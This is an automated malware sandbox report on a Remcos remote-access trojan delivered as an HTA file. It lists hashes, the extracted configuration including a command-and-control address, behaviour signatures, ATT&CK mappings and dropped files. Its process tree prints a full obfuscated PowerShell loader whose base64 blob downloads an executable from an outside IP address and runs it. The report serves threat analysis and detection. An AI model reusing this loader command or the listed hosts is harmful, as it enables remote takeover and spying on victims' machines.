remcos | 6f907156e59692c088586b695fd5aeafb27e504c18472c316c5ee73d99865470

General

Target

crreatedbestthingswithgreatattitudeneedforthat.hta
Size

142KB
MD5

22ca9f87ffb6d9d3dc9d7e4f151470c7
SHA1

df9bcef5ab55d8a5342bb7747d7936f4fe20afe7
SHA256

6f907156e59692c088586b695fd5aeafb27e504c18472c316c5ee73d99865470
SHA512

e4949a19b36fff2946b507911f39f587dd5db088a453292e3e24a4c4510c39e9e8d7dc3c32281b22586a5e29d46f58a68201e9ed721dead80f2fcdd96048f9a2
SSDEEP

768:t1EiK3jK+yum2oum2U+5KUJDVUKhC14GVf/AtK36zyYnhH+K7TwTxKe+uvYcWqkO:tn

Score

10^/10

remcos elvis defense_evasion discovery execution rat

Malware Config

Extracted

Family

remcos

Botnet

elvis

C2

107.173.4.16:2560

Attributes

audio_folder
MicRecords
audio_path
ApplicationPath
audio_record_time
5
connect_delay
0
connect_interval
1
copy_file
remcos.exe
copy_folder
Remcos
delete_file
false
hide_file
false
hide_keylog_file
false
install_flag
false
keylog_crypt
false
keylog_file
logs.dat
keylog_flag
false
keylog_folder
remcos
mouse_option
false
mutex
Rmc-GJDISH
screenshot_crypt
false
screenshot_flag
false
screenshot_folder
Screenshots
screenshot_path
%AppData%
screenshot_time
10
take_screenshot_option
false
take_screenshot_time
5

Signatures

Remcos
Remcos is a closed-source remote control and surveillance software.
rat remcos
Remcos family
remcos

Blocklisted process makes network request 1 IoCs

flow	pid	Process
3	2636	powershell.exe

Downloads MZ/PE file

Evasion via Device Credential Deployment 2 IoCs

defense_evasion execution

pid	Process
2636	powershell.exe
2076	cmd.exe

Executes dropped EXE 1 IoCs

pid	Process
3028	nicetomeetyousweeet.exe

Loads dropped DLL 4 IoCs

pid	Process
2636	powershell.exe
2636	powershell.exe
2636	powershell.exe
2636	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 6 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	csc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cvtres.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	nicetomeetyousweeet.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe

Modifies Internet Explorer settings 1 TTPs 1 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe

Suspicious behavior: EnumeratesProcesses 1 IoCs

pid	Process
2636	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	2636	powershell.exe

Suspicious use of WriteProcessMemory 20 IoCs

description	pid	Process	procid_target
PID 1688 wrote to memory of 2076	1688	mshta.exe	28
PID 1688 wrote to memory of 2076	1688	mshta.exe	28
PID 1688 wrote to memory of 2076	1688	mshta.exe	28
PID 1688 wrote to memory of 2076	1688	mshta.exe	28
PID 2076 wrote to memory of 2636	2076	cmd.exe	30
PID 2076 wrote to memory of 2636	2076	cmd.exe	30
PID 2076 wrote to memory of 2636	2076	cmd.exe	30
PID 2076 wrote to memory of 2636	2076	cmd.exe	30
PID 2636 wrote to memory of 2644	2636	powershell.exe	31
PID 2636 wrote to memory of 2644	2636	powershell.exe	31
PID 2636 wrote to memory of 2644	2636	powershell.exe	31
PID 2636 wrote to memory of 2644	2636	powershell.exe	31
PID 2644 wrote to memory of 2080	2644	csc.exe	32
PID 2644 wrote to memory of 2080	2644	csc.exe	32
PID 2644 wrote to memory of 2080	2644	csc.exe	32
PID 2644 wrote to memory of 2080	2644	csc.exe	32
PID 2636 wrote to memory of 3028	2636	powershell.exe	34
PID 2636 wrote to memory of 3028	2636	powershell.exe	34
PID 2636 wrote to memory of 3028	2636	powershell.exe	34
PID 2636 wrote to memory of 3028	2636	powershell.exe	34

C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\crreatedbestthingswithgreatattitudeneedforthat.hta"
1⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:1688
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" "/c poWErShELL.EXE -Ex ByPAsS -nop -W 1 -c dEviceCRedeNtIaldEplOyMENt.ExE ; invokE-ExPRessiOn($(INvOke-ExPRessION('[System.tEXT.enCodinG]'+[cHaR]58+[cHaR]58+'UTf8.GeTString([SysteM.cONvERT]'+[chaR]58+[ChAr]58+'fRombAsE64stRiNG('+[CHAr]34+'JGcycmogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZEQtVFlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVNYmVyRGVmaW5pVElPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJsbW9OLkRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTFVOSEJ3eFdNS2gsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG1KZmxJZlp1Wix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHdsLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBUZHhzKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQU1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJtcVFzZCIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUVTcEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBpTFggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkZzJyajo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjE3OS4xNjYvNzYvZWNvbWUuZXhlIiwiJGVuVjpBUFBEQVRBXG5pY2V0b21lZXR5b3Vzd2VlZXQuZXhlIiwwLDApO3NUYXJ0LVNMRUVwKDMpO0ludk9LZS1leHByZXNTSW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU52OkFQUERBVEFcbmljZXRvbWVldHlvdXN3ZWVldC5leGUi'+[CHaR]0x22+'))')))"
  2⤵
  - Evasion via Device Credential Deployment
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2076
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    poWErShELL.EXE -Ex ByPAsS -nop -W 1 -c dEviceCRedeNtIaldEplOyMENt.ExE ; invokE-ExPRessiOn($(INvOke-ExPRessION('[System.tEXT.enCodinG]'+[cHaR]58+[cHaR]58+'UTf8.GeTString([SysteM.cONvERT]'+[chaR]58+[ChAr]58+'fRombAsE64stRiNG('+[CHAr]34+'JGcycmogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZEQtVFlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVNYmVyRGVmaW5pVElPTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgiVXJsbW9OLkRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTFVOSEJ3eFdNS2gsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG1KZmxJZlp1Wix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHdsLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBUZHhzKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQU1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJtcVFzZCIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUVTcEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBpTFggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkZzJyajo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzE5Mi4zLjE3OS4xNjYvNzYvZWNvbWUuZXhlIiwiJGVuVjpBUFBEQVRBXG5pY2V0b21lZXR5b3Vzd2VlZXQuZXhlIiwwLDApO3NUYXJ0LVNMRUVwKDMpO0ludk9LZS1leHByZXNTSW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkRU52OkFQUERBVEFcbmljZXRvbWVldHlvdXN3ZWVldC5leGUi'+[CHaR]0x22+'))')))"
    3⤵
    - Blocklisted process makes network request
    - Evasion via Device Credential Deployment
    - Loads dropped DLL
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2636
  - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
      "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\nwonvsm-.cmdline"
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:2644
    - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES51AA.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC51A9.tmp"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2080
  - - C:\Users\Admin\AppData\Roaming\nicetomeetyousweeet.exe
      "C:\Users\Admin\AppData\Roaming\nicetomeetyousweeet.exe"
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      PID:3028

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

1

T1112

Credential Access

Discovery

System Information Discovery

1

T1082

System Location Discovery

1

T1614

System Language Discovery

1

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\RES51AA.tmp

Filesize
1KB

MD5
231bd52dc7439bba251272cae3e4d318

SHA1
641a9acb586866345f751d5c904d5e2aac153de1

SHA256
4a9ea347c34633b51985bc581815a85e2b031a7dc5a5c50d452faaa5f9440160

SHA512
82fc959401195037c4a72cb1ad2c6602b08b101d70b6890db8cad16f526bcc7e7c6b31b2b78535e35ee4345ab31bcf377a561436ed1183a3f86ffbcf41d223e9

Download Submit
C:\Users\Admin\AppData\Local\Temp\nwonvsm-.dll

Filesize
3KB

MD5
5f23f7054f66283c49b88b714229dc93

SHA1
226d34bec9d07d9ab433f120c4ab4e97d616cd77

SHA256
a560600f8d8f127957ea89bcfa198eb6c6d9236a763f68bb39269823c399a131

SHA512
ca73e9b90e6cb2c70d9c1ee8728248f38906c0bc0eb1c1221f2574cb50ffb2558e75a8e2ea3d38659fb74c29fd644523c04c677be22ed5867cb2e86ed31d160f

Download Submit
C:\Users\Admin\AppData\Local\Temp\nwonvsm-.pdb

Filesize
7KB

MD5
965f859617328356306a3bf742547ffb

SHA1
94b997dfed717a10e74ee891c0e38b6852e818e9

SHA256
58db4bfbe05f7acd1960c1c13689078372b9af50fde24c3568b3a075df139c42

SHA512
d0ebdd2e00910a4aaea31f576266a7059947cc768eb57b3b780d0e8bba2e91d1c6f12fbb6f642cb1e6db452b049e1adab18f03163c6ac5f35b2e8bf0d324c4ec

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\CSC51A9.tmp

Filesize
652B

MD5
3fdcc3672039aa7b981410f10cfb6cf2

SHA1
c13d238dc1ffcb42647a27aada00ee073a10f166

SHA256
d1aff747b863248fe591ad8a6c812e215622c3192312e8c248fd37e1f0f99520

SHA512
7aa58b027843b4f28852a2c8c8f38a14d854c5cb82e0b290b638e48b3538aa6118644c59c597ea4d29f8ac0ec54619c30d2047f305eeab7a41c9017c32185dc0

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\nwonvsm-.0.cs

Filesize
478B

MD5
80c03b4485808d996cc8226157f377a7

SHA1
7cc7e02b84232b1523c555a349c86fc059a98eff

SHA256
240b4ca770e75d02c83cb17844897b66b8c671c1477654d797146a19e0bcf12d

SHA512
ee72fd6d3ec1d6a3645c59c72a7816bcf6cf34b04683a2611eedb1897d5781c7fb92bdb1d295671b2c107a2008100e8ab1010a7401bd6c651bfed2219f15656c

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\nwonvsm-.cmdline

Filesize
309B

MD5
2eb5f5af0f3121c90a4d13fcf04181a6

SHA1
a1bf83f3026d48261c366a1ed906c77e076ab7cd

SHA256
bcd172a6ba8c3bb4662fd968f97a9b40062abb79e27c8a0a5763bd7c1e2f2c3c

SHA512
80433c3651c0314ce9fe92954cb540764ade1ad1e595595150578e9e3b511e239907744ef503421bcc18d0c4afa4ad3a650249f55731ed7bc23195743dbecd41

Download Submit
\Users\Admin\AppData\Roaming\nicetomeetyousweeet.exe

Filesize
528KB

MD5
a2d03c5333bfecca62720cd6ee3a4dc4

SHA1
ce4c380f2748f375904c17b38d4f93e294fef4f6

SHA256
ef8ec5181ab4cf85a5c4867089594f40900eaafb514496905eb86314c460178e

SHA512
5c9db8bb415da332c0adc24519ae0410a65aba932de15a682ce57efbc61b8b7d7e5e3548164909a5da5bc6966c351528626655fdbb7c21f3b4fd1974406ae04c

Download Submit
memory/3028-35-0x0000000000400000-0x000000000048B000-memory.dmp

Filesize
556KB

Download
memory/3028-39-0x0000000000400000-0x000000000048B000-memory.dmp

Filesize
556KB

Download
memory/3028-34-0x0000000000400000-0x000000000048B000-memory.dmp

Filesize
556KB

Download
memory/3028-32-0x0000000000400000-0x000000000048B000-memory.dmp

Filesize
556KB

Download
memory/3028-36-0x0000000000400000-0x000000000048B000-memory.dmp

Filesize
556KB

Download
memory/3028-37-0x0000000000400000-0x000000000048B000-memory.dmp

Filesize
556KB

Download
memory/3028-38-0x0000000000400000-0x000000000048B000-memory.dmp

Filesize
556KB

Download
memory/3028-33-0x0000000000400000-0x000000000048B000-memory.dmp

Filesize
556KB

Download
memory/3028-40-0x0000000000400000-0x000000000048B000-memory.dmp

Filesize
556KB

Download
memory/3028-41-0x0000000000400000-0x000000000048B000-memory.dmp

Filesize
556KB

Download
memory/3028-42-0x0000000000400000-0x000000000048B000-memory.dmp

Filesize
556KB

Download
memory/3028-43-0x0000000000400000-0x000000000048B000-memory.dmp

Filesize
556KB

Download
memory/3028-44-0x0000000000400000-0x000000000048B000-memory.dmp

Filesize
556KB

Download
memory/3028-45-0x0000000000400000-0x000000000048B000-memory.dmp

Filesize
556KB

Download

Analysis

Sharing